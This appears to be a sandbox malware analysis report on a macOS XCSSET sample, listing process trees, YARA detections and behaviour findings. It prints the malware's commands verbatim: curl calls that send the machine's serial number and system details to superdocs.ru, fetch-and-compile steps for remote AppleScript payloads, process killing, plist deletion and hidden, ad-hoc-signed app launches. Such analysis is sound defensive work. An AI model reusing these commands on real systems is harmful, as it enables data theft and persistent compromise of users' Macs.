bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -k -s --connect-timeout 14 -d 'MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l

curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -k -s --connect-timeout 14 -d MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l

sh New Fork (PID: 1068, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ps aux | grep -E 'com.apple.net|com.utils.core|com.metal.core|agentde|canaryde|operade|speedde|edegede|firefoxde|yandexde|avatarde|bravede' | grep -v grep | awk '{print $2}' | xargs kill -9

bash New Fork (PID: 1069, Parent: 1068)

ps (MD5: 48b7f71ab3866eee46d3ef67f8233168) Arguments: ps aux

bash New Fork (PID: 1070, Parent: 1068)

grep (MD5: 99be09a23ac46af2879dc015993ca389) Arguments: grep -E com.apple.net|com.utils.core|com.metal.core|agentde|canaryde|operade|speedde|edegede|firefoxde|yandexde|avatarde|bravede

bash New Fork (PID: 1071, Parent: 1068)

grep (MD5: 99be09a23ac46af2879dc015993ca389) Arguments: grep -v grep

bash New Fork (PID: 1072, Parent: 1068)

awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk {print $2}

bash New Fork (PID: 1073, Parent: 1068)

xargs (MD5: 8f884810645d2a6e0b1a4d499993857c) Arguments: xargs kill -9

sh New Fork (PID: 1074, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c echo 'superdocs.ru' > ~/Library/Caches/GitServices/.domain

sh New Fork (PID: 1075, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ioreg -c IOPlatformExpertDevice -d 2 | awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'

bash New Fork (PID: 1076, Parent: 1075)

ioreg (MD5: d03e2df1848ceb731ba4a8c3e82b2011) Arguments: ioreg -c IOPlatformExpertDevice -d 2

bash New Fork (PID: 1077, Parent: 1075)

awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk -F' /IOPlatformSerialNumber/{print $(NF-1)}

sh New Fork (PID: 1078, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -k -s --connect-timeout 14 -d 'updated .domain with superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l

curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -k -s --connect-timeout 14 -d updated .domain with superdocs.ru -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l

sh New Fork (PID: 1079, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c echo ~/Library/Caches/GitServices/.rep

sh New Fork (PID: 1080, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c date -r '/Users/pedro/Library/Caches/GitServices/.rep' +'%s' || echo 9999999999

bash New Fork (PID: 1081, Parent: 1080)

date (MD5: 9983eb16b31b7224ae79b51b2b49ee75) Arguments: date -r /Users/pedro/Library/Caches/GitServices/.rep +%s

sh New Fork (PID: 1082, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c date +'%s'

date (MD5: 9983eb16b31b7224ae79b51b2b49ee75) Arguments: date +%s

sh New Fork (PID: 1083, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c [ -d /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/ ] && echo '1' || echo '0'

sh New Fork (PID: 1084, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/'

mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/

sh New Fork (PID: 1085, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/remove_old.applescript | osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sound.app'

bash New Fork (PID: 1086, Parent: 1085)

curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -sk -d user=pedro https://superdocs.ru/agent/scripts/remove_old.applescript

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
exec.2430808	EXT_SUSP_OBFUSC_macOS_RootHelper_Obfuscated	Yara for the public tool \'roothelper\'. Used by XCSSET (https://gist.github.com/NullArray/f39b026b9e0d19f1e17390a244d679ec)	im0prtp3	0x3f78:$a1: E: neither argv[0] nor $_ works. 0x3f99:$c1: %s%s%s: %s\x0A 0x3f60:$c2: x%lx 0x3f65:$c3: =%lu %d 0x3f6d:$c4: %lu %d%c 0x36b1:$opcodes_3: E8 9A FD FF FF 8B 85 E8 FD FF FF 2B 85 D0 FD FF FF 83 C0 01 89 85 EC FD FF FF E9 0A 00 00 00

Dropped Files

Source	Rule	Description	Author	Strings
/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a	JoeSecurity_XCSSET	Yara detected XCSSET	Joe Security

Matched rule: EXT_SUSP_OBFUSC_macOS_RootHelper_Obfuscated date = 2021-06-07, author = im0prtp3, description = Yara for the public tool \'roothelper\'. Used by XCSSET (https://gist.github.com/NullArray/f39b026b9e0d19f1e17390a244d679ec), reference = https://twitter.com/imp0rtp3/status/1401912205621202944, score =

Source: classification engine

Classification label: mal100.troj.spyw.evad.mac2430808@0/32@2/0

Persistence and Installation Behavior

Writes compiled Apple script to disk (with potentially malicious intention)

Source: /usr/bin/osacompile (PID: 1001)	File written: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/main.scpt			Jump to dropped file
Source: /usr/bin/osacompile (PID: 1035)	File written: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a			Jump to dropped file

Searches for processes that are suspiciously named

Source: /usr/bin/osascript (PID: 1037)	Ps and grep: /bin/sh -> sh -c ps aux \| grep -E 'com.apple.net\|com.utils.core\|com.metal.core\|agentde\|canaryde\|operade\|speedde\|edegede\|firefoxde\|yandexde\|avatarde\|bravede' \| grep -v grep \| awk '{print $2}' \| xargs kill -9			Jump to behavior
Source: /bin/sh (PID: 1068)	Ps and grep: /bin/bash -> sh -c ps aux \| grep -E 'com.apple.net\|com.utils.core\|com.metal.core\|agentde\|canaryde\|operade\|speedde\|edegede\|firefoxde\|yandexde\|avatarde\|bravede' \| grep -v grep \| awk '{print $2}' \| xargs kill -9			Jump to behavior

Writes Mach-O files to untypical directories

Source: /usr/bin/osacompile (PID: 1001)	FAT Mach-O written to unusual path: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet			Jump to dropped file
Source: /usr/bin/codesign (PID: 1002)	FAT Mach-O written to unusual path: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet.cstemp			Jump to dropped file

Tries to delete plist files with Apple identifiers

Source: /bin/bash (PID: 992)	Apple named plists deleted: /bin/rm -> rm -f /Users/pedro/Library/LaunchAgents/com.apple.airplay.plist	Jump to behavior
Source: /bin/bash (PID: 993)	Apple named plists deleted: /bin/rm -> rm -f /Users/pedro/Library/LaunchAgents/com.apple.airplay.plist	Jump to behavior
Source: /bin/bash (PID: 994)	Apple named plists deleted: /bin/rm -> rm -f /Users/pedro/Library/LaunchAgents/com.apple.spx.plist	Jump to behavior
Source: /bin/bash (PID: 995)	Apple named plists deleted: /bin/rm -> rm -f /Users/pedro/Library/LaunchAgents/com.apple.spx.plist	Jump to behavior

Likely kills multiple processes

Source: /usr/bin/osascript (PID: 1037)	xargs kill via ps: /bin/sh -> sh -c ps aux \| grep -E 'com.apple.net\|com.utils.core\|com.metal.core\|agentde\|canaryde\|operade\|speedde\|edegede\|firefoxde\|yandexde\|avatarde\|bravede' \| grep -v grep \| awk '{print $2}' \| xargs kill -9			Jump to behavior
Source: /bin/sh (PID: 1068)	xargs kill via ps: /bin/bash -> sh -c ps aux \| grep -E 'com.apple.net\|com.utils.core\|com.metal.core\|agentde\|canaryde\|operade\|speedde\|edegede\|firefoxde\|yandexde\|avatarde\|bravede' \| grep -v grep \| awk '{print $2}' \| xargs kill -9			Jump to behavior

Source: /bin/bash (PID: 961)	Xxd executable: /usr/bin/xxd -> xxd -p -r	Jump to behavior
Source: /bin/bash (PID: 964)	Xxd executable: /usr/bin/xxd -> xxd -p -r	Jump to behavior
Source: /bin/bash (PID: 967)	Xxd executable: /usr/bin/xxd -> xxd -p -r	Jump to behavior
Source: /bin/bash (PID: 970)	Xxd executable: /usr/bin/xxd -> xxd -p -r	Jump to behavior
Source: /bin/bash (PID: 973)	Xxd executable: /usr/bin/xxd -> xxd -p -r	Jump to behavior
Source: /bin/bash (PID: 976)	Xxd executable: /usr/bin/xxd -> xxd -p -r	Jump to behavior

Source: /usr/bin/osacompile (PID: 1001)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osacompile (PID: 1001)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist	Jump to behavior
Source: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet (PID: 1023)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist	Jump to behavior
Source: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet (PID: 1023)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1028)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1028)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist	Jump to behavior
Source: /usr/bin/osacompile (PID: 1035)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osacompile (PID: 1035)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist	Jump to behavior

Source: /bin/bash (PID: 1017)

Launch agent/daemon unloaded: launchctl unload -w /Users/pedro/Library/LaunchAgents/com.apple.spx.plist

Jump to behavior

Source: /bin/bash (PID: 1000)	Mkdir executable: /bin/mkdir -> mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail	Jump to behavior
Source: /bin/bash (PID: 1010)	Mkdir executable: /bin/mkdir -> mkdir -p /Users/pedro/Library/LaunchAgents	Jump to behavior
Source: /bin/bash (PID: 1013)	Mkdir executable: /bin/mkdir -> mkdir -p /Users/pedro/Library/Caches/GitServices	Jump to behavior
Source: /bin/bash (PID: 1031)	Mkdir executable: /bin/mkdir -> mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers	Jump to behavior
Source: /bin/bash (PID: 1045)	Mkdir executable: /bin/mkdir -> mkdir -p /Users/pedro/Library/Caches/GitServices/	Jump to behavior
Source: /bin/bash (PID: 1084)	Mkdir executable: /bin/mkdir -> mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/	Jump to behavior

Source: /bin/bash (PID: 1051)	Grep executable: /usr/bin/grep -> grep https -b3	Jump to behavior
Source: /bin/bash (PID: 1062)	Grep executable: /usr/bin/grep -> grep -q enabled	Jump to behavior
Source: /bin/bash (PID: 1070)	Grep executable: /usr/bin/grep -> grep -E com.apple.net\|com.utils.core\|com.metal.core\|agentde\|canaryde\|operade\|speedde\|edegede\|firefoxde\|yandexde\|avatarde\|bravede	Jump to behavior
Source: /bin/bash (PID: 1071)	Grep executable: /usr/bin/grep -> grep -v grep	Jump to behavior

Source: /bin/bash (PID: 1028)	Osascript command executed: osascript /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt			Jump to behavior
Source: /bin/bash (PID: 1037)	Osascript command executed: osascript /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a			Jump to behavior

Source: /bin/bash (PID: 1015)

Chmod executable: /bin/chmod -> chmod +x /Users/pedro/Library/Caches/GitServices/AppleWebKit

Jump to behavior

Source: /bin/bash (PID: 979)	Curl executable: /usr/bin/curl -> curl --connect-timeout 11 -s -k https://melindas.ru	Jump to behavior
Source: /bin/bash (PID: 982)	Curl executable: /usr/bin/curl -> curl -ks -m 5 -H X-Usr: pedro https://melindas.ru/sys/prepod.php	Jump to behavior
Source: /bin/bash (PID: 1034)	Curl executable: /usr/bin/curl -> curl -sk -d user=pedro&build_vendor=default&build_version=1.1.5 https://superdocs.ru/apple/com.php	Jump to behavior
Source: /bin/bash (PID: 1043)	Curl executable: /usr/bin/curl -> curl -k -s --connect-timeout 14 -d module launched. connRetries: 0. Used domain: superdocs.ru -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l	Jump to behavior
Source: /bin/bash (PID: 1067)	Curl executable: /usr/bin/curl -> curl -k -s --connect-timeout 14 -d MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l	Jump to behavior
Source: /bin/bash (PID: 1078)	Curl executable: /usr/bin/curl -> curl -k -s --connect-timeout 14 -d updated .domain with superdocs.ru -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l	Jump to behavior
Source: /bin/bash (PID: 1086)	Curl executable: /usr/bin/curl -> curl -sk -d user=pedro https://superdocs.ru/agent/scripts/remove_old.applescript	Jump to behavior

Source: /bin/bash (PID: 1029)	Ping executable: /sbin/ping -> ping -o -t 3 superdocs.ru			Jump to behavior
Source: /bin/bash (PID: 1039)	Ping executable: /sbin/ping -> ping -o -t 3 superdocs.ru			Jump to behavior

Source: /usr/bin/osacompile (PID: 1001)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osacompile (PID: 1001)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist	Jump to behavior
Source: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet (PID: 1023)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist	Jump to behavior
Source: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet (PID: 1023)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1028)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1028)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osacompile (PID: 1035)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osacompile (PID: 1035)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist	Jump to behavior

Source: /bin/rm (PID: 1006)

File deleted: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns

Jump to behavior

Source: /usr/bin/codesign (PID: 1002)

Bundle code signature resource File created: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/_CodeSignature/CodeResources

Jump to behavior

Source: /usr/bin/osacompile (PID: 1001)	Permissions modified for written FAT Mach-O /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet: bits: - usr: rx grp: rx all: rwx			Jump to dropped file
Source: /usr/bin/codesign (PID: 1002)	Permissions modified for written FAT Mach-O /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet.cstemp: bits: - usr: rx grp: rx all: rwx			Jump to dropped file

Source: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet (PID: 1023)	Shell command executed: sh -c osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt'	Jump to behavior
Source: /bin/sh (PID: 1028)	Shell command executed: sh -c osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt'	Jump to behavior
Source: /usr/bin/osascript (PID: 1028)	Shell command executed: sh -c ping -o -t 3 superdocs.ru	Jump to behavior
Source: /usr/bin/osascript (PID: 1028)	Shell command executed: sh -c rm -rf '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers'	Jump to behavior
Source: /usr/bin/osascript (PID: 1028)	Shell command executed: sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers'	Jump to behavior
Source: /usr/bin/osascript (PID: 1028)	Shell command executed: sh -c whoami	Jump to behavior
Source: /usr/bin/osascript (PID: 1028)	Shell command executed: sh -c curl -sk -d 'user=pedro&build_vendor=default&build_version=1.1.5' https://superdocs.ru/apple/com.php \| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a'	Jump to behavior
Source: /usr/bin/osascript (PID: 1028)	Shell command executed: sh -c osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a' > /dev/null 2>&1	Jump to behavior
Source: /bin/sh (PID: 1029)	Shell command executed: sh -c ping -o -t 3 superdocs.ru	Jump to behavior
Source: /bin/sh (PID: 1030)	Shell command executed: sh -c rm -rf '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers'	Jump to behavior
Source: /bin/sh (PID: 1031)	Shell command executed: sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers'	Jump to behavior
Source: /bin/sh (PID: 1032)	Shell command executed: sh -c whoami	Jump to behavior
Source: /bin/sh (PID: 1033)	Shell command executed: sh -c curl -sk -d 'user=pedro&build_vendor=default&build_version=1.1.5' https://superdocs.ru/apple/com.php \| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a'	Jump to behavior
Source: /bin/sh (PID: 1036)	Shell command executed: sh -c osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a' > /dev/null 2>&1	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c whoami	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c ping -o -t 3 superdocs.ru	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -s --connect-timeout 14 -d 'module launched. connRetries: 0. Used domain: superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c mkdir -p ~/Library/Caches/GitServices/ && touch ~/Library/Caches/GitServices/.ed	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c (plutil -p ~/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist \| grep 'https' -b3 \|awk 'NR==3 {split($4, arr, '\'') print arr[2]}') \|\| echo 'com.apple.safari'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c defaults read loginwindow SystemVersionStampAsString	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c defaults read /Applications/Safari.app/Contents/Info CFBundleShortVersionString	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c defaults read /Library/Preferences/com.apple.alf globalstate	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c csrutil status \| grep -q enabled && echo 1 \|\| echo 0	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c sysctl -n machdep.cpu.brand_string	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -s --connect-timeout 14 -d 'MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c ps aux \| grep -E 'com.apple.net\|com.utils.core\|com.metal.core\|agentde\|canaryde\|operade\|speedde\|edegede\|firefoxde\|yandexde\|avatarde\|bravede' \| grep -v grep \| awk '{print $2}' \| xargs kill -9	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c echo 'superdocs.ru' > ~/Library/Caches/GitServices/.domain	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -s --connect-timeout 14 -d 'updated .domain with superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c echo ~/Library/Caches/GitServices/.rep	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c date -r '/Users/pedro/Library/Caches/GitServices/.rep' +'%s' \|\| echo 9999999999	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c date +'%s'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c [ -d /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/ ] && echo '1' \|\| echo '0'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/remove_old.applescript \| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sound.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c plutil -replace LSUIElement -bool YES '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sound.app'/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sound.app/Contents/Resources/applet.icns' https://superdocs.ru/agent/bin/icons/Empty.icns	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c codesign --force --deep -s - '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sound.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c open -na '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sound.app' &> /dev/null & echo $!	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c basename '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sound.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -s --connect-timeout 14 -d 'mapping: remove_old - com.utils.core.sound.app' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/payloader.applescript \| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.graphics.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c plutil -replace LSUIElement -bool YES '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.graphics.app'/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.graphics.app/Contents/Resources/applet.icns' https://superdocs.ru/agent/bin/icons/Empty.icns	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c codesign --force --deep -s - '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.graphics.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c open -na '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.graphics.app' &> /dev/null & echo $!	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c basename '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.graphics.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -s --connect-timeout 14 -d 'mapping: payloader - com.utils.core.graphics.app' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/listing.applescript \| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sysd.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c plutil -replace LSUIElement -bool YES '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sysd.app'/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sysd.app/Contents/Resources/applet.icns' https://superdocs.ru/agent/bin/icons/Empty.icns	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c codesign --force --deep -s - '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sysd.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c open -na '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sysd.app' &> /dev/null & echo $!	Jump to behavior
